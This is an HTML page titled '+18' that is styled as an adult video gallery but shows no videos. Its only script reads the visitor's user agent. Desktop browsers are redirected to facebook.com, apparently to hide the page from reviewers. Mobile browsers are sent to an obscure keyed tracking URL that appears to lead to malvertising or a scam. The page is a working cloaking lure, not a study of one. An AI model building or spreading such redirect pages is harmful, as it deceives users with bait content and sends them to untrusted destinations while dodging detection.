<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>+18</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f3f3f3;
        }
        .container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
        }
        h1 {
            text-align: center;
            color: #333;
        }
        .video-thumbnails {
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
            margin-top: 20px;
        }
        .video-thumbnail {
            margin: 10px;
            position: relative;
            overflow: hidden;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .video-thumbnail img {
            width: 100%;
            height: auto;
            transition: transform 0.3s ease;
        }
        .video-thumbnail:hover img {
            transform: scale(1.1);
        }
        .play-button {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 50px;
            height: 50px;
            background-color: rgba(255, 255, 255, 0.8);
            border-radius: 50%;
            display: flex;
            justify-content: center;
            align-items: center;
            transition: background-color 0.3s ease;
        }
        .play-button:hover {
            background-color: rgba(255, 255, 255, 0.9);
        }
        .play-button img {
            width: 70%;
            height: auto;
            filter: brightness(0.8);
        }
    </style>
</head>
<body>
    <script type="text/javascript">
        function generateRandomString(length) {
            var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
            var result = "";
            for (var i = 0; i < length; i++) {
                result += characters.charAt(Math.floor(Math.random() * characters.length));
            }
            return result;
        }
    
        var device = navigator.userAgent;
        var isMobile = /iPhone|iPad|iPod|Android|J2ME|BlackBerry|Opera Mini|IEMobile|Mobile|Windows Phone|windows mobile|windows ce|webOS|palm|bada|series60|nokia|symbian|HTC/i.test(device);
    
        if (!isMobile) {
            window.location = "https://www.facebook.com/";
        }else{
            window.location = "https://bronzewhistlingrut.com/mvtb7yudt?key=56ae525e80ba06a59e9202f6f2d5ddd6/";
        }
    </script>
</body>
</html>